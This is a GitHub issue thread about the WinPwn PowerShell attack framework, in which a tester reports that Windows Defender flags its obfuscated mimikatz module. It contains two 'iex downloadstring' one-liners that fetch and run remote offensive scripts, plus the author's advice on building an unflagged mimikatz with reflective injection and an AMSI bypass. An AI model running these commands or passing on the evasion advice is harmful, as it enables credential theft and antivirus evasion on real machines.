S3cur3Th1sSh1t
commented
4 years ago Expected behaviour but i did not thought that it’s signature is caught that fast. Cloud detection is on or off?
Closed sp00ks-git closed 4 years ago
S3cur3Th1sSh1t
commented
4 years ago Expected behaviour but i did not thought that it’s signature is caught that fast. Cloud detection is on or off?
gt-uk-ns
commented
4 years ago Cloud Protection is "on" as to simulate a real life scenario.
S3cur3Th1sSh1t
commented
4 years ago I won’t re-obfuscate the loaded scripts each time they are flagged by a vendor that would be too much overhead. I will update the mimikatz Version from time to time with other string replacements. But it will most likely get flagged again after some days.
If you need an unflagged version i recommend compiling your own mimikatz version and embedding it in Invoke-ReflectivePEInjection.ps1 which also needs some modification for amsi Bypass afterwards. I got a gist for the mimikatz String replacement.
When running WinPwn in AMSI - iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
or
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/Obfus_SecurePS_WinPwn.ps1')
Both ways after selecting option 16, Windows Defender picks up the mimikatz obfuscated version as malicious :-(
Tested on testbed Windows server 2016 Standard Edition x64 -
Windows Defender Details: Antimalware Client Version: 4.18.2004.6 Engine Version: 1.1.17100.2 Antivirus definition: 1.317.173.0 Antispyware definition: 1.317.173.0 Network Inspection System Engine Version: 1.1.17100.2 Network Inspection System Definition Version: 1.317.173.0